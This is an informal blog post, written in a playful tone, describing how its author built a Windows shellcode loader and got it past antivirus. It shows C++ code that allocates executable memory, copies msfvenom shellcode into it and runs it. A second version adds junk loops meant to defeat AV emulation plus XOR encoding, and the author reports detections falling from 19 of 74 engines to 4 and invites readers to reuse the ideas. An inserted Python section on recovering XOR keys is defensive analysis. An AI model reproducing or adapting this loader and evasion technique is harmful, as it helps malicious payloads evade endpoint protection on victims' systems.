popping a calc on windows
popping a calc :o
beginnings
i wanted to open a calculator
getting started
so first i created a c++ project and wrote some code to pop a calc
#include <windows.h>

// shellcode[] and shellcode_size come from the msfvenom output (x64, see the
// "oops!" section below); the post does not reproduce the bytes
int main() {
    // ask for a fresh, committed, readable+writable+executable region
    void *exec = VirtualAlloc(
        nullptr,
        shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (exec == NULL) {
        return 1;
    }
    // copy the bytes into the executable region and jump to them
    RtlMoveMemory(exec, shellcode, shellcode_size);
    ((void(*)())exec)();
    return 0;
}
oops!
ohno my code no work :(
what happened
- i forgot to specify x64 when making shellcode with msfvenom
- i forgot to add execute to page permissions
this took me about 30-40 minutes in total to fix :)
anyways, defender (obviously) caught it, so what next?
silly stuff
antiviruses aim to provide protection without disrupting the user experience, so they cannot spend too much time on one file. if a program contains a lot of loops, emulating it eats up too many resources or something like that (i read it in some strange document from ages ago)
anyways all i did was add a little loop before my program started (and xored the shellcode)
#include <windows.h>
#include <climits>
#include <random>

// shellcode[], shellcode_size, key, key_size and xor_decrypt() are defined
// elsewhere in the project; the post does not reproduce them
int main() {
    int a = 0, b = 0;
    std::random_device rand;
    std::mt19937 gen(rand());
    std::uniform_int_distribution<int> rng(0, INT_MAX);
    // junk loop #1: a busy count that does nothing useful
    for (int i = 0; i < INT_MAX - 1; i++) {
        a++;
    }
    if (a != INT_MAX - 1) {
        return 1;
    }
    // junk loop #2: pointless random draws; "a & 0xFFFFFFFF;" is a no-op
    // statement and is left in on purpose
    int res;
    for (int i = 0; i < INT_MAX - 1; i++) {
        b = rng(gen);
        res = a ^ b;
        a & 0xFFFFFFFF;
    }
    res = b;
    a = res;
    // only now decode the payload and run it exactly as in the first version
    xor_decrypt(shellcode, key, shellcode_size, key_size);
    void *exec = VirtualAlloc(
        nullptr,
        shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (exec == NULL) {
        return 1;
    }
    RtlMoveMemory(exec, shellcode, shellcode_size);
    ((void(*)())exec)();
    return 0;
}
the loop is completely meaningless, but the antivirus has to step through it anyway since it performs real operations, which in theory makes it give up on scanning the file
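the xor layer from the analyst's side, as an added example that is not from the post: given a blob carved out of a sample, guess the key length from byte coincidences, recover the key by assuming the most common plaintext byte is 0x00, and decode. the payload, the key and the function names are constructed for this demo and are not the post's shellcode or xor code.

```python
from collections import Counter


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def guess_key_length(blob: bytes, max_len: int = 32) -> int:
    """Estimate the key length from byte coincidences at each shift s.

    When s is a multiple of the key length, blob[i] and blob[i + s] were XORed
    with the same key byte, so repeated plaintext bytes (the zero runs in code)
    still collide; at other shifts the differing key bytes mask them.
    """
    rates = {}
    for s in range(1, min(max_len, len(blob) // 2) + 1):
        pairs = len(blob) - s
        hits = sum(1 for i in range(pairs) if blob[i] == blob[i + s])
        rates[s] = hits / pairs
    # max() returns the first of equal maxima, so the period beats its multiples
    return max(rates, key=rates.get)


def recover_key(blob: bytes, key_len: int, expected: int = 0x00) -> bytes:
    """Per key position, assume the most frequent ciphertext byte hides
    `expected` (0x00 for code and data) and XOR it back out."""
    key = bytearray()
    for j in range(key_len):
        most_common, _ = Counter(blob[j::key_len]).most_common(1)[0]
        key.append(most_common ^ expected)
    return bytes(key)


def triage_blob(blob: bytes) -> tuple[bytes, bytes]:
    """Return (recovered key, decoded payload) for a carved XOR blob."""
    key = recover_key(blob, guess_key_length(blob))
    return key, xor_bytes(blob, key)


# Constructed stand-in for a carved payload: 108 distinct non-zero bytes
# interleaved with zero runs to mimic the zero density of machine code.
PAYLOAD = b"".join(
    bytes([3 * t + 1, 3 * t + 2, 3 * t + 3, 0, 0, 0, 0]) for t in range(36)
)
KEY = bytes([0x2A, 0x9D, 0x63, 0xF1, 0x4C, 0xB8])  # constructed 6-byte key
ENCODED = xor_bytes(PAYLOAD, KEY)                   # what an analyst would carve

if __name__ == "__main__":
    key, payload = triage_blob(ENCODED)
    print("key length:", len(key), "key:", key.hex(), "decoded:", payload == PAYLOAD)
```

the same zero-frequency trick is why a short repeating xor key adds almost nothing once a sample is in an analyst's hands; it only helps against a signature on the raw bytes.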
conclusion
my theory must have been pretty close, because i dropped detections from 19/74 to 4/74
while this is nothing special, it was a fun little project to do pre-workout. :D now that it’s on virustotal tho, rip this code; please do not be surprised when you try this 6 months later and it gets flagged to oblivion :(
instead, take the ideas here and apply them to your own!!
credits
- thank you gatari for telling me that i Do Not need to mess with virtualprotect
- msfvenom for the shellcode
- chat gpt for the xor code